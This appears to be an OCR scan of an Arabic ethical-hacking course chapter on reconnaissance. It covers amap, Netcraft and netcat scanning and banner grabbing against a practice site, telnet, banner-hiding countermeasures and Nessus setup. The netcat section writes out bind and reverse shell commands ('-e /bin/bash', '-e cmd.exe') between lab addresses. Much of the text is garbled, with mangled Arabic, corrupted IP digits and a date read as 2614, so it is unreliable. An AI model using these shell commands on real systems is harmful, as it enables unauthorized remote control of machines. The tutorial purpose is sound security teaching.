:^^[make] j*VI <> *1$jjVI ^ [./configure] j^VI <jU1> jVI Amap sbVl f 
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i^VIS ^jkll [amap©www.certifiedhacker.com©80]>^VI <xjlkj ^ 



:/amap-5. 4# amap wwv^'.ce 


'tifiedhackor.com 8Q 




amap v5.4 (www.thc.org/thc-amap) 


started at 2614-03-27 0O:46:O6 • 


- APPLICATION MA 


PPING mode 






jthis connect 






this connect 






jthis connect 






Protocol on 202 . 75 . 54 . IGl : 8Q/tcp 


matches http 




Protocol on 202 . 75 . 54 . 1G1 : SG/tcp 


matches http-iis 




Unidentified ports: none. 






amap v5.4 finished at 2014-03-27 


00:46:17 




# 1 







JiSAj [75-85] ^UaII (jUaj ^l^klujl Ui£ «jj 
^l^kiajl jl (man©amap) man ciiUij^a ^jla j^Yl li$J l^j^-YI cjUIvnuhVI j ^cl jilt <i j*-* Uj£ *j 

.(amap©»help) 



NETCRAFT 



|n Sitereportforwww.certifiedhacker.com + 

bar.netcraftxorrv , site_report?url= http://www.certifiedhacker.com 




P * # * - fit 



C*£FT • Services- 



Since: October 2012 Rank: 10056 Site Report E!3 [US] Amazon.com. Inc. 



Netcraft Extension 



• Home 
Download Now! 

• Report a Phish 

• Top Reporters 

• Incentives for reporters 

- PhishiestTLDs 
Phishiest Countries 

• Phishiest Hosters 
Phishing Map 

• Takedown Map 

• Most Popular Websites 

• Branded Extensions 
1 Tell a Friend 

Phishing & Fraud 

• Phishing Site Feed 

• Hosting Phishing Alerts 

- SSL CA Phishing Alerts 
Registry Phishing Alerts 

• Domain Registration Risk 

• Bank Fraud Detection 

• Phishing Site Countermeasures 

Extension Support 

i FAO 



Site report for www.certifiedhacker.com 



Lookup another URL: 




Share: 


OOOQO© 


Enter a URL here 


H Background 




Site title 


Certfied Hacker 


Date first seen 


December 2002 


Site rank 


63367 


Primary 
language 


English 


Description 


A brief description of this website or your business. 


Keywords 


keywords, or phrases, associated, with each page, are best 


□ Network 




Site 


http://www.certifiedhacker.com 


Netblock 
Owner 


TM VADS DC Hosting 


Domain 


certifiedhacker.com 


Nameserver 


ns3.noyearlyfees.com 


IP address 


202.75.54.101 


DNS admin 


hostmaster@noyearlyfees.com 


IPv6 address 


Not Present 


Reverse DNS 


nsl.noyearlyfees.com 


Domain 
registrar 


tucows.com 


Nameserver 
organisation 


whois.tucows.com 


Organisation 


certifiedhacker.com, certifiedhacker.com, 
92345, US 


Hosting 
company 


myloca.com 


Top Level 
Domain 


Commercial entities (.com) 


DNS Security 
Extensions 


unknown 




Hosting 
country 


E MY 










~~«- fr\ ~l ~. ,~ \ 









SINGLEHGP 



Bare Metal 
& Cloud 

BACKED BY THE 

INDUSTRY'S 
BEST SLA 



See why 
it's better -» 
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NETCAT 



http ://netcat.sourcef or ge.net :>i— Jl 
stai" j& Netcat J ^—^^^ ^ > » ii <j] ."(jjN^aN l^j^j^I lA^I ^ \ft > > " ^1 l^lc (j^Ls C5JI j ^j -0 Netcat 
UDP j TCP ^ > jjjjj JM^Ij J^J W sbVI ^ jl UDP j TCP ^iJ jSII 

JJ&\ ^ <jjau3U Ujj^ j^jj liA jl£ lit a^UJIj J^*J^ -u^*-— ^ cs* J**^ Netcat J ^.j-OJI jJI ." 

^c^l^JI j <jj^i3l ^I^JI Jja ^j-G <U > nj jl s^jujU-o I^qIa^LujI (j^j <^JI I^j (jjj ^Jl 'back-end' uj^J ^ staVI £>i& 

j' t> 'UDP jt TCP jJI j! SjjL-all cjVU^VI - 
.TCP UDP t> Jl— 31 lP* ^! Jl^iVU L^i ^ill ^(tunneling mode) Jl— SVI - 
AixJI t \u^M ^-UuJI j listening port/interface < source port/interface) Jl— jVI iS^S cj^UU^ ^^a. ^j^j 

.^Jiiilt JL^iVU 

.randomizer *Jaxjj| j^jjjuJI ^ j&JI iaUJI <j^aai 4_L^aLa. 
J stderr) hexdumpj (M 5 N l£ j^) {buffered send-mode} J^jj t— j J^ - 

4 a uull j^-Vl j ncatj nc u^^k cs-^ sbVI (jl ^^131 ^ .uim & jLixJI JL^ajVl ^c-^j V Netcat sbVI (jli ^^jJaljiia! J£aij 

. SSL^ ji^ll Jl^iVI f&si (jft] j nc -Jl c> 
(apt-get©install©netcat) ^ t> lA^ Sjijia jSj ^ lit jSIj Jl£ Jji^lll ^Lfcu ^Jijj^ sbVl ^ 



j£jj*uJ) ^ <a jULalt ^Ha]| -1 

Jxxlaij ^uIaslSI ^IjaII j ttilli ^ lg_La ^^jj! j Jjjaal Nmap- 3 ^ o^j j^j^^^ ^ j^ 3 ^ ^aLLcJI (j^ai Netcat Jl ^Jalaij 

" ^ 



: # nc -vv 


- z 


-w2 www.certifiedhacker.com 75-8G 


DNS fwd/rev mismatch 


: www.ee rtif iedhach 


^er.com ! = nsl.noyearlyfees.com 


www.certifiedhacker. 


com 


[2G2.75.54.1G1] 


8G 


(http) open 


wvM.certifiedhacker. 


com 


[2Q2.75.54.1Q1] 


79 


[finger] : Connection timed out 


www . ce rtif iedhacke r . 


com 


[202.75.54.101] 


78 


(?) : Connection timed out 


www.certifiedhacker. 


com 


[202.75.54.101] 


77 


(rje) : Connection timed out 


www.certifiedhacker. 


com 


[202.75.54.101] 


76 


(?) : Connection timed out 


www.certifiedhacker. 


com 


[202.75.54.101] 


75 


(?) : Connection timed out 


sent G, rcvd G 










root(3jana:-# 











ic^VlS nc UtuiklJ ^311 c^ljUail A^aulU \J 
.cj^j liU aj^j] sj\ verbose mode ^ J^A? J^ ^I^VI J*^J (-vv) 
.(jjlijtj oU^^a. j JL^ajl J£3 Time out Jl ^j^J (-w) 

,iaLL<Jl (j^aaS 4)\aC* JaxJjoij (-z) 

: dJi Jlia 



#nc©-vv©-w2©-z©202.75.54.101©l-100 



#nc©-vv©-w2©-z©202.75.54.101©l-100©400-500 



UDPj TCP atii ^ jflj^U JU^SVt -2 

: cjVU ^ s^Lo jj^i jl c jSa 3 TCP/UDP JU^iVI 

ialiall t> Banner U\ 
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Uj^j <JL^jI CjLqji^j JU^j^l! 
:^2VLS FTP u^ill 21 & TCP cjjjJI/jiUI <> 21 202.75.54.101 ?J^W uWtfL fji <^U2I Jll*il ^ 



:~# nc -vn 202 .75 .54 . 161 21 
(UNKNOWN) [202.75.54.181] 21 (ftp) open 
220-Mic rosoft FTP Service 
220 Welcome TO FTP Account 



.Ctrl+C ■ •-' ^ jj^JJj J ■ -"'V 1 aJLc [-n] jL^Jl Ua l^ia^iU 
U*i ^ HTTP o^JI 80 TCP cjjjJI/jiiall Jitk <> 21 202.75.54.101 ?J^W JLaMt* ^Ull Jli»ll ^ 

html 4ai-a o-b ^J*^ HTTP HEAD ^ J>-jW 





# 


nc -vv -n 2Q2.75.54.101 80 


(UNKNOWN) 


[2C 


)2. 75. 54. 101] 80 (http) open 


HEAD /HTTP 


/l 


1 


sent 15, 


rcvd 0 


: 







^Mlj UDPj TCP ^i* JS ^UL,V1 -3 

^i.nlt J^lk <> JL^il ^221 tSlli cJ^Lk J JjaJI cjllnki ^u^il ^i* Netcat TCP/UDP J 1 

i^Jtill JIUI 511a ^ ^ -Netcat ftv^mU ^k^j aj^U^ ijiii jVI J jUJ .(TCP/UDP JL-aSl) 

Aa^Jj (JJJ^-lJ ^UaJ ^^Ic a IgJ-LttaJL LaUjj (JaslSI CjISjI <jaj^j^l3 dlt£ Cllill ^I^JjujI Aa^Jj Aa^x* ^jxi (jjijl 

Cllll ^Jajajl 6666 ^— ; a ^ jljjaj ^jVI 4-dUai3 <j^aj^k-<Jl jIAj^VI J^a^L ^13 \ <^-Lq jjAlij ^Uaj till aJ c£^ll 

;aJU3I Sjjj-alt ^ U£ 192.168.16.73 j <^ J-^l < ^ <**^ t> J-^VI jU^I j 



: # nc -vlp 6666 
listening on [any] 6666 . . . 



fc:\nclllnt>nc 192.168.16.73 6666 



. J^ttd! jl*2aV (s&j verbose (_ v ) 
,< ^ajjl t ^1 listening (-1) 

_4_llc. Cl^Iill ^l^yJl djjjill ^fjj OJjujUxj \ g » lijj port C5^*^ ("P) 

[JUl I (jjj^j ^ j£i 6666 ^jj^l * o j cJ^^Vl C5 lc 



^ 192. 168. 16.72 IP u'j^ 



.U-a jl^-aJl <jL ^ djl^ dull ^jxj <!Lujj ^ ojjj^II a jl^ a j JU^jVI (jVl 

;6666 ^jj^^ j^c- ^ Jl^ajVU 





# nc -vlp 6666 










listening 


on [any] 6666 . . . 










192. 168. 1£ 


).72: inverse host lookup failed 


: Unknown 


server 


error 


: Connection tin 


ed out 












connect tc 


) [192.168.16.73] from (UNKNOWN) 


[192.168 


16.72] 


48039 




1 













j& Ia£ hello ahmed, how are you jjj ajLJI ^-Uj jlii^U ^ jL 



nc -vlp 6666 
listening on [any] 6666 . . . 

192.168.16.72: inverse host lookup failed: Unknown server error 
ed out 

connect to [192.168.16.73] from (UNKNOWN) [192.168.16.72] 48039 
ihello Ahmed, How are you? 



Connection tim 
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^:\nclllnt>nc 192.168.16.73 6666 
lello Ahmed, Ho w are you? 


1 







.Netcat ?\ j^o J^al <1£ <j^^' ^LkU li£&j 



;<Jjoija3I jl \\ J J^VI (3f2aj A-AaslSI ^Usll J (jJjl^a. Qli djlilxJl <Jaj IaJ > uJ Igil Netcat L - J ^ l>* 



: # nc -vlp 5666 > t> 


ct.txt 


listening on [any] 6666 ... 




■J^fi^ti jlg-Ji * jJsfl a\K 1( jl l j*txttxt^ AW 



fc:\nclllnt>nc 192.168.16.73 6666 < txt.txt 



(Remote Administration with Netcat) ^ CP Jl^WI -5 
JSoij jajjjaJI j jl^^JI Jo s jjlaa. Netcat -Jl ciiVlAxiajl jia^l .Backdoor lU*^ Netcat -Jl J*^ ^ 

^jiJ J /bin/bash j Jj^j J cmd.exeJ^ g^b* ^AjLJI JL*jI Netcat -SI slJ jliaj dii^ .^lo 

jj jjj^ll Sj^b JL^aj!>l! <!jLa^ J aJLaJI CjUj^a^oll o^l tort's lS^-^I I^a IaiLuj Backdoor Netcat lUc- 

(Bind shell) JjSft jjjU^I - 

,^xj (jO j-al jVl (J-asu jl,lj^jj 4_j j-saLiJl jj jjja^l > J (JIj^jVI <!LoaJj Aa^.1 j>a qJIoLuiaII .'U's <o L .ilki 4l jjjliiJ! J 

*l jj ja ;cil3i j a ££ s j^U« iii jjj(non-RFC 1918 address) <^JI J^ J^ IP u' ^ u 1 ^ 

a Jia <£jjj| Jo <J j-aUk J°/°^ JP jl jjo 4jJ (JjjJ ^1 NAT J 1 ^'^ 

; JVI£ JL^£U iiia ^1 g5Uj » jl^ Jo TCP ^ Jj /bin/bash -^j Jj £^ 'j^j^' JU^V 
4 LjLuuj ^Uaj jl£ |j| cmd.exe ^1 ^ (j^l^i) A-^jJall 4£jLulaj ^ jSj ci j-uj (A^jASI Jo Jjja jp j) Jo tillaj) In ^ Jl^i 

>c >4lSJ ^Uaj lift >c> ulL] ^Uaj jlS lit /bin/bash j jj^j 



:~# he -Ivvp 4444 -e /bin/bash 
listening on [any] 4444 ... 

■ 



.J^JI Jl /bin/bash J-^jL? ^ ^11 ^j^- 6666 Jl JU^VI ^ JU J execute J*^ e jW^I 

f bt j \(\-\ a JI^aj JlufljVb ^ jSj j-uu ^ill jA j nat t ^1 J^ IP cjl J^ V (Jj^Lj JJLualt ^Uaj dlL&j) x^l 

(<Jo j^ljSfl 



uin32-l -12>nc 192.168.16.73 6666 

Link encap: Ethernet HWaddr 00 : 0c : 29 : 0d : a3 : a4 

inet addr:192 .168 .16 .73 Beast : 192 . 168 . 16 . 255 Mask : 255 . 255 . 255 . 0 
lnet6 addr: f e80 : : 20c : 29f f : f e0d : a3a4/64 Scope :Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric :1 
RK packets : 670631 errors :0 dropped :0 overruns :0 f raine : 0 
TH packets : 5508253 errors :0 dropped : 0 overruns :0 carrier :0 
collisions :0 txqueue len : 1000 

RK bytes :719067241 <685.7 MiB> TX bytes : 251298974 <239.6 MiB> 
Interrupt =19 Base address = 0x2000 

lo Link encap: Local Loopback 

inet addr =127.0.0.1 Mask : 255 . 0 . 0 . 0 

inet 6 addr: : : Scope =Host 

UP LOOPBACK RUNNING MTU:65536 Metric :1 

RX packets : 18270 errors :0 dropped :0 overruns =0 f rane : 0 
TX packets : 18270 errors :0 dropped : 0 overruns :0 carrier :0 
collisions =0 txqueue len : 0 

RX bytes :1320770 <1.2 MiB> TX bytes : 1320770 <1.2 MiB> 



(\\ (j^l^Jl jn^nl JJLuuil ^Uaj Jo 4^jnilt tiSjJaau ifconfig J^VI nj HaS 1^ a JLg^ Jluaj^b U-aS UjI ia^^U 



C = Snetcat- 
iF conf ig- 
eth0 
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(Reverse shell) J^ J^J-^* 

.NAT ( ^ 4j (J-^^Ji (J I c^l IP (j\ jjc a) V Aa^I j! liA ^jSI . 6 jl^a C5 Ic J-oljVI (J^» J V V V Aa^ a ^jIj 

I^Vl^ -laSS <J jL^ajVI ^alJ iiialt ^JlJ A*aJ ^ jL L_fl jjoj liA 



C:/>nc©-vlp©6666 



#nc©-v©192.168.16.72©6666©-e©cmd.exe 



:j?i\£ Netcat v ^a^t >»tj^S o^l* 







ji-isi.'afi jLufiu^i al_%^ "ijBviS "/bin/bash" j»t*vii'ii 


-c 






Netcat ^"LjjJ n j^ni jS-^tii 


-h 


" "port scanner" ^ inft ■ vtt 


-i 


"server mode" JLuia^fi ^^Egj* is^. g^UjJi 


-1 


"domain" e-** J-^- "IP" ^Ujaii 


-n 




-o 


,i ^"i 1.1*1 ft IBinll iSj 


P 




-r 


."EOF" 


-q 


J *l> J-l --.11 ^jli j^C^ 


-s 


■--■^n Jj^jm J-Ji "TELNET negotiation"' 


-t 


UDP Jj^J* ak*=ki«1 


-u 


".VV" ^JLia^ 


-V 


"Port scanning" j-aju-aji ^'lmSi ^js- i^aJt 4 ft-i j-*Sfi ija a ssl.ij 


-z 



Jtia SSL^ ji^l JU^WI JA\ j nc -SI (> Sjjk^ Neat 



#nc©-v©192.168.16.72©6666©-ssl 



TELNET 

^ TCP/IP cjULnki ^> <j1 U£ jl j±±£l\ s j^L JL^£U TCP/IP ^Vj^jjjjj c> J>jjjjj Telnet >j 
,4^1^! (j el u£ j] La£ AJlxi <L^)iaj j!i jjj^ll jl^a. ^lAaJLoal ^jj ^^£3 Telnet lS^*-*^ ^ <^l,^iuil 

j (ci^Jl jl^-aJ!) ± ja. j^ll Telnet (JJJ^J jL^ajVU (Jj^al<Jl jlg-aJl) ± ja. jxll Telnet Jl c5jj^ ^l^klajU jL^ajVI 

± y± jJt) Jj^jj jjJI ( Jj^aiJ I C5 la^l! jj j^all jl^a. <suUll s^a. jll (jjifSaj ^> Jl^ajVI Iajj .Telnet Daemon uj^ ^ 
^aii jll jj jjj^ll jW?" ^ j^I) Telnet lSj^jj jj^ cJ^^VI a£jjoi Jc <J^ij (<Jj^l<JI Ja^JI j!i jjj^I j^-^ Jc Uiajl 
aj! cJLujjj ^jjj tSl£La^ ^Ujj£ Telnet c5jj^ ci^s ^ > V^ll jW^JI l*-iL j jj jjj^II Telnet Jj 

^iLdll Jc ^aLujj (Telnet Daemon) -Jl ul UJc m M* A\ jj* jjj^II l)^ I A ^ aSjjuoII jjc 1 ^'y^; J - al^ll j-«ljl 
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(Telnet) Jt 

lA aiji gal] Source J Lf' VU 1 ^Laij^all j L ^ till ^jiajAJjuj 4 £3 j-a c_JJj ^ ^Telnet ^I^JLuit aJ -1 

<J jj^^JI j 4 (JjjIj 1 lj£ dJ LiA .(J^a J > <"» *l ^^>^ CljjljVl J-Q LoJlic ^AaJLujJ Telnet <J^ (jV 

J^U <> L^U^j ^ ^1 J e I^L,U tSUi j UUi Gate FTP lU^ lUs j#i FTP Client ^ ^ Telnet ^\^^\ -2 

. Telnet Jl 

\juL j 6cJjLo>j ^jjj U JLojjI j jll tilljLajj j POP Mail J^V^ Telnet c> <-*^*j -3 

Jj' 1 ^ .Hotmailj Yahoo USL^ ^ v^m^ l J^t ^ cJikj UJa .POP Mail i> lW^ u 1 ^ (i j 



U Ic jj s^jlill L^jj ^jj^al l^Jajua <jV U j£i3 4aU. V lsj^S djU^k Telnet 

AjIjIjp) j Telnet 



C:\telnetOwww.certifiedhacker.comO80 



.Telnet ^ «- Starts- Run 6* Telnet ^ 



GET /HTTP/1.1 fS 




C ;\Wi ndows\5ystem32\cmd.exe 



HTTF^i-1 403 Forbidden 
ength: 213 
uvir I t ft ytti SYit: m 1 
IcroEof t -113^6 .0 

By: flSP.HET 
, 11 fluff ZB12 09:57:0V GttT 
n - ciose 

itnlXheadXt it l.e>Erroir</'t It lc X/headXb&dyKheaiiXtitle directory List ing ] 
< ^ t it le X /Iw^ad > 

< bodyXhl >Direct5ry Listing DeniedOhi>This Uirtual Direct di 
s not allot* contents to be lis t ed , <^body><^body><^html> 

n to host lost . 



DISABLING OR CHANGING BANNERS))BANNER GRABBING il »Jl-i*« j«lJSll 



t^ulajli jIa^Ij tJjixjoLill 4^<Jaj| 4S^_^.VI ^1 ji\ ^ ml > ^ diL* jhu* 4ijjt-<J (jj-^l^xJI JjS Banner Grabbing di-ffi ^1^^ 

^jja t^L ^aLiJI ^Uaill ajLa^J i's^aW jajI^jII (j^su ^Uucl 'lil .AjL^jfc (j^aj ^ (j-o j i (security patches)u^*^^ CjI > ^ 

: j^3l ^ U^j^ c Banner Grabbing^ 

Disabling or changing banners (cjUaVI j^j j\ J^xj) 

Display false banners to misguide attackers (u^W^ cjIjU^ o^j^) 

Turn off unnecessary services on the network host to limit information disclosure 

IIS users can use these tools to disable or change banner information: 

1- IIS Lockdown Tool ( http://microsoft.com ) 

2- ServerMask ( http://www.port80software.com ) 

Apache 2.x with mod_headers module - use a directive in httpd.conf file to change banner 
information Header set Server "New Server Name" 

o*h ls* jL*^ ^ httpd.conf ^I^VI ^ ^^i^i mod_headers *^ 2 <^L') 
Alternatively, change the ServerSignature line to ServerSignature Off in the httpd.conf file. 

■C5-^M fik* o- 3 ^^ httpd.conf ^l^cVI ^ off ^jJl ServerSignature j^) 
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(HIDING FILE EXTENSIONS FROM WEB PAGES) **J« *bi- <> ctfUll * lilt 




IIS users use tools such as 
PageXchanger to manage the 
file extensions 



Apache users can use 
mod_ negotiation directives 




reveal information about the 
rver tr?chnolp£Y that an attacker 
to launch attacks 



Hide file extensions to mask 
the web technology 



nge application mappings such 
asp with .htm or ,foo P etc, to 
ise the identity of the servers 



It is even better if the file extensions are not at all used 

i— laoll diL* jlx-<Jl aifc ^lAajjail j£ a) g *W i (tS xAjji$\ La. j3 jjaj* <J ja. CjLg jl*-* ^Aaj* t flL&II ^lAj^l/clitaalxi 



tL^scjJall Jallj jc 

.tlSp (j^ajll dil JJJjU jjjirl _4_iaj>»ljj,j]| dAajL Aj3 jjll <JJaj £.taa.V SAi^ <juijLua CllliLJl ^l^l<»l/Cjla^L» s-lia.] .CjLaa-gJl jjaij 

.mod_negotiation fl-^a^J (Apache) y^LVl ^^i^ .cjU^LJI <jja *Ua.V t«lli Jl U j .fooj .htm^ 

.CjULJ! dibliLdl/cjla^Li SjbV Pagexchanger cjIj^VI I j^Aalujj US ^Aalui* .djULJI cjblAlJ/ciAiLaXa ^jbV 



SCAN FOR VULNERABILITY aijtin o^fl 3.5 



.t flajJall Jalij jc iliaal] c fll (J^ai CllS jll jla. * <-J^ J^ ja. CliLaAaJlj <a. jjixJl iflllallj IP jjjLc j>» <Lajti lip] jVI 

Jalij .jUa.VI c> J Jilujj jl jS-^ jll jJI jl ^Uiill jjj£j* J i btjjal l <Jaaj ^ (i fl*jJal l Jalij) Vulnerability 
jj^j U Ullc. . (missing patches)*^ j^Jl cj U^^M ! ^ laii jj jL^VI c_Jc.i J jalj s jjja Jll^l J JL jl ja^j t axjjal l 

jblkl ^tjaJ La Ullc. tgja^L^al ^jj ^1 jll ^Jaill jl CiLa^jJt .c <!■> > ^ jl Aijjstxa ^^L^aV (patches) ClAaaaj^aJ dllajJoll 

j-a SAaJj AjaLlL Asu jc 4-ia *j;^ CjUuIxjII Ajijj ,Aau jc 4-ia ^j; CjUuIxjII (J^asu AjilL ^<uujJ L_kxjJa3l Jallj (J^axj jV (jjlj^l 

_ jalgll <jjou31j <joj^L<JI ^jjj jj^ll 

aixJI jj jjj-^U J-alSlI ^aaal) jja.VI c5 jl jj^a.!^!] ^joij Asu (Remote code execution) cjUuLuII iiiii 

t^AjAa. ^cxil jj CIjjjjj j tdiliLJl jl lIjIaILoixJI L_flia. j 4 jjjaj* t^cjoij j > <aJ^J V (j^J j 'l!-'^ ^ .A-0L0I LjAjuoa \ > all ^ L_ u£ jl Loa 

'backdOOrS J' key loggers ^^^j tCjLaj jj^l <aila^> ^Ijjj AjlAaJl jljAa. Jia AjcIAjJ! CjI aH^ll JjJaxJ jl lIjIjjjaj $-1 ja.lj 
(Jjla-Loj L— ua 3 S II ( ; u ^ ^ jjuj l-<^ tft ^JaaJl oAA ^ 9J jl ^ aSI jx» /oAjAa. CjVI ^ * H Ijj jjjaia-<Jl jj jJJjaall ^1 laJLujIj 



iU jilwJ flxjJall ialaj] ^LxJajVl (j^aail ^Uajll Jl <J jj^ jll ja. Jc jj^aJl j I^^IslJjojI 

.(vulnerability scanner) 



(j-alaJl JlaJl j^Vl <Jj J t axjJall Jalij jl CjI jsull AjAaJ 4 kml jJ tiL <j^alaJI jL^ajVI J til^LaaJ Liajl ( flxjJall jllia.1 

j-d ^1 Jc JjJxJl ,Jja-AJ ^A^JjoiaII a£jjoJI J L_axjJa!l Jalaj jc dia-Jl 4_isu jj-aa-l^Jl Jj3 j-d <joiij ^ j^^aW li^ ^lAaJjaal Uiajl 
Jalij AjAaal lAA ^lAalajl ja-<»J Jila.VI <Jj^al j^3l jH,^ U>^H AajJJl Jl J ja.^31 Jc J jj^aaJl j l^J^Ulojl ja-dJ a hu^al\ JaUj 

.I^J^.t.j.u)Ij l^JC jl jjujVI djaJ JjS l^a.!)L^lj AiA^JjauJl 4_JjLaj3l ^JLacV 4_il<iVl L_kxjJall 
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(Vulnerability scanning can find the vulnerabilities in)<-k^J! jj5*Jt ££a± uk J afl LUS ^ outfit 






■ 







VULNERABILITY SCANNING TOOL: NESSUS 

;^JU3l c_jjj3I ^ (j* I^-Iia^j <lj ; (^jjJ jixJI ^jj^n^l.^u ^.j ciu£ LJlla) UL^* <^.ll<ij ^ilac. obi Nessus 

http://www.tenable.com/products/nessus 

'Nessus < Jjjj^ <*jL^a3l a£jJo3I 5 Tenable 
lJjjoj ^jaJ .Home ^jauuall <>> V^j Professional <^a31 J j > ^N t*ll ji^VI ^H^i tc^tS jj^JI aIlj ^ Nessus 
di^JI jl http ://nessus.org/register ^jUj JjjL ciUij ^Ui* ^ Jj^^il J^jIL ^ .4^1 ^ <M j^ll ^^ki^i 

.Nessus V-^J* **i^ t ^ 



<3Jjia c fll un^b ^Axiil SbVI .^c-oUjJl (bUgS) P-Ua^Vl (jC tllaallj ^ajl} (_^ilt L_a»_jJa3l Jataj ^aai3 ^UjJ jA NeSSUS 

(Date gathering) £AjI#II -1 

(Define Host) ^ -2 

(port scan) iaUJI -3 

(plug-in selection) ^a^yi c^UjUl jbikl -4 

(Reporting of data) ^M^l c> t^V 1 -5 

^jjjJ j^lS (Jj^j ^-jts t4 £>i& ^j-<i s-lgljVl Asu registry cJ jil CjI jUldl <! l-jL ^ j j^3l <c j-^^ 

jj^jjll ^ala ^ iiiaVl cjl^ijl! service pack patch level JJ u^j ^^J^ registry Cjbl^l J^^jll 
cj! jUikl iilSl Cj^Uuoij lafisj j ^Uij ^ Jaxj Nessus .^^11 ^ cj^^JIj t Internet Explorer 

6 (authentication method)^-^^ Ai^l > ^> ^ l-uILujI j <j *u^aLk djUUj s^cli ^ > .^^Ixill ^aaillj ^ji^j t^qVv^ A\ < > >^\\ Jalaj 

. jUVl CjI jbikl aJc£1 <iJ ^(Nessus Attack Scripting Language) NASL J^Aj jJI 
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:Nessus JSjjfrill 4 h\"\ oi l cjlj^l &a csh 

^vim^ l jli ^ .(separate plug-in) J^ai« ^lual (security test) l£ -1 

NeSSUS^J^-^ ^^J^ CjUuIxjI! Se-ljii jl jlajJaVl (Jj^ CjljLlkVl 4iLjal <U j^udJ 

JjIaxJI j ^qUll Jjt_>:^j (j^-Gj .a^LgVI jll 6<J^*-^ j j^g-St ^ill t^LJI/^LkJI ^ Nessus ~3 



.j5St j FreeBSD 'OS X Oj^j <l>^ ^ *wA>M 5^ lU»j Nessus 

jl^cj ^j^<i .^jjj d±£ lij ^LJL JL^ajVl ^ £ t^jj^Axld cillxii ^jU till ^joij Uui 6 ^Li/cJjLftc ^jojUa ^hvimU J-<ixj Nessus 
^Lixulxjll ^I^JI ^jaxJI tilU^ j Q^j.*iy.nA (S^^ o* l}c>\&1\ t^jqKll ^ £ lI^s f^^l 'Nessus 

JU£] ^Ii^j ^Nessus .(jj^j/o x ^ l£> J) ls* Nessus ^ j^V^ l^- 

http://www.tenable.com/products/nessus ^j^ l> Nessus ci^ 3 ^ ■ 1 

.ciL o-aUJI jljj^ ^j^Ij Nessus ^ c#J^ HomeFeed J j > ^^ J;^^]! .2 

_ciiifu3l ^Aaxj ^UJ! wizard Jj^j 6 rpm apt-get CP- ^'j^ cS^ 3 ^^ 



* wizard Jj^j j' 6 rpm apt-get <j&j^ c> J 

.^Uajll J jj^a jll NeSSUS ^ ^Lou> pUSljj .4 

.(Professional jt) 4? o- 3 ^^ HomeFeed J^^j .5 

.Nessus ^Wf^J JL^V s^jll ^L^aio .6 



Jj^Lj JjL^uII ^Uaj ^ 4jjUJI CjljkaJI ^LjL Nessus 

;aJU3I djhK A\ Lib Nessus ^u/^ ^ 



Nessus Home Directory 


Nessus Sub-Directories 


Purpose 


Windows 


\ Prog Iran 




Configuration files 




Stylesheet templates 




\n$ssu&\pluglrL£ 


Nessus pl ug ins 




% n*asu s\ua« ra\< tiivrnane > \ 


User knowledgebase 
saved on di sk 






Nessus log files 



□jll ^ij^Ld Nessus^- 5 o^^J^ j*^^ ^->.^L>.^I ^Jaja ^c^U^JIj ^aLkJI wizard '"y.^^ aJ-^c ^ ^l^ljVl axj 

.Nessus lU^ ^ ^ c^^j ^ o- 3 ^^ 
.ssl c> Nessus ^Lkj JU^jVI ^ Here ^ ^ > ^ 



Welcome to Nessus! 



neToNessus-lnstal 



e i 



Welcome to Nessus! 

Please connect via SSL by clicking here . ^BS^ 

You are likely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or you 
can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information. 
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Add Exception j^l J^- I understand the risk 1*j <&j* jjc. 4 ^4 , ^1 1 oia> 0 L <JiLi j^ki 



Untrusted Connection 



# https://localhostS834 



C B~ Google 



« - ft 



This Connection is Untrusted 

You have asked Firefox to connect securely to k>calhost:8834, but we can't confirm that your 
connection is secure. 

Normally, when you try to connect securely, sites will present trusted identification to prove that you 
are going to the right place. However, this site's identity can't be verified. 

What Should I Do? 

If you usually connect to this site without problems, this error could mean that someone is trying to 
impersonate the site, and you shouldn't continue. 



Get me out of here! 
Technical Details 
I Understand the Risks 

If you understand what's going on, you can tell Firefox to start trusting this site's identification. Even if 
you trust the site, this error could mean that someone is tampering with your connection. 



Don't add an exception unless you know there's a good ri 
identification. 



n why this site doesn't use trusted 



Add Exception^ 



: Confirm Security Exception ^ > ^ Add Exception Vii > ^V 



Add Security Exception 



You are about to override how Firefox identifies this site. 
\ \ Legitimate banks, stores, and other public sites will not ask you to do this. 



Location: http s://l o c a I h o st: SS34/ 



Get Certificate 



Certificate Status 

This site attempts to identify itself with invalid information. View 
Wrong Site 

Certificate belongs to a different site, which could indicate an identity theft. 
Unknown Identity 

Certificate is not trusted,, because it hasn't been verified by a recognized authority 
using a secure signature. 



0 Perm a nently store this exception 



Confirm Security Exception Cancel 



Get started J* 











^- HI!;- llM.4l»10lt j.-.l- 








Nessus 

















Welcome to Nessus 5 

Thank you for installing Nessus. the world leader in vulnerability scanners Nessus will allow you to perform: 

• High-speed vulnerability discovery, to determine which hosts are running which services 

• Agentless auditing, to make sure no host on your network is missing secunty patches 

• Compliance checks, to verify and prove that every host on your network adheres to the security policy you defined 

• Scan scheduling, to automatically run scans at the frequency you select 

• And morel 

During the next steps, we are going to create an administrative account and register your scanner with a Plugln Feed, which we will download. 



Get started = 



I^VIS Next ^» > ^ ^xj ^5 Nessus ^v^n* j ajMI s jlaaJt J I 
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Nessus 

vulnerability scanner 



Initial Account Setup 

First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/delete 
users, stop ongoing scans, and change the scanner configuration. 

Login: janateba | 
Password: •••••••• | 

Confirm Password: •••••••• | 

< Prev Next > 



Because the admin user can change the scanner configuration, the admin has the ability to execute commands on the remote host. Therefore, it should be 
considered that the admin user has the same privileges as the "root" (or administrator) user on the remote host. 

cdi <j-aUJI ^ jj^Vi ^J^' t> ^ j^W Nessus fjL t dL ^UJI ^ jj^Vl ^J^' u' f^^Nessus 
http://www.tenablexom/products/nessus/nessus-plugins/obtain-an-activation 

Next -i^jJall <S (j^aj^LxJ! £JJ-<Jl ^ J^4^ ^ (J-ataJ! ^jjl&lVl ^JJ^l J^a. ^ C5 Ic J jj^a^Jl Asu 




4" A https://localhosfc8834/register/ 5 ~ | flf Goog/e Pj D " 4" # ^ ^ ^+ I ^ 



Nessus 

vulnerability scanner 



Plugin Feed Registration 

As information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable 
Nessus to detect their presence. The plugins contain vulnerability information, the algorithm to test for the presence of the security issue, and a set of 
remediation actions. Enter your Activation Code below to subscribe to a "Plugin Feed". 



Please enter your Activation Code: xxxx-xxxx-xxxx-xxxx-xxxx 



